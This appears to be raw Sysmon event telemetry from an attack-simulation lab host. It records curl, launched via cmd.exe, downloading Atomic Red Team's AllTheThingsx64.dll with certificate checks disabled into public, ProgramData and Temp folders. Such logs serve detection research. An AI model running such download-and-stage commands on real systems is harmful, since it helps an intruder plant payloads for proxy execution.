CorporationCRYPT32.DLLMD5=95BA70CFA8087A209500D7D350BF3A59,SHA256=4265157E8DC2A0E32A6328D54181CC31FD24E3017E60B270623C2CDBE5FAB4FAtrueMicrosoft WindowsValid 734700x800000000000000034354072Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.010{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000034354071Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.009{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000034354070Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.009{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000034354069Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.008{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000034354068Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.008{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000034354067Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.007{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000034354066Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.006{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000034354065Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.006{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000034354064Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.005{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeC:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.exeMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528false-Unavailable 25542500x800000000000000034354063Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.005{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exeImage is replaced 10341000x800000000000000034354062Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.004{8B6011A9-888A-6164-7000-00000000F101}34483444C:\Windows\system32\csrss.exe{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000034354061Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.004{8B6011A9-F329-616E-043B-01000000F101}29362664C:\Windows\system32\cmd.exe{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8564|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000034354060Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.004{8B6011A9-F32A-616E-053B-01000000F101}6316C:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.exeC:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\users\public\music\allthethingsx64.dll C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528{8B6011A9-F329-616E-043B-01000000F101}2936C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\users\public\music\allthethingsx64.dll & C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll --output c:\users\public\music\allthethingsx64.dll & C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\programdata\allthethingsx64.dll & C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o %Temp%\allthethingsx64.dll"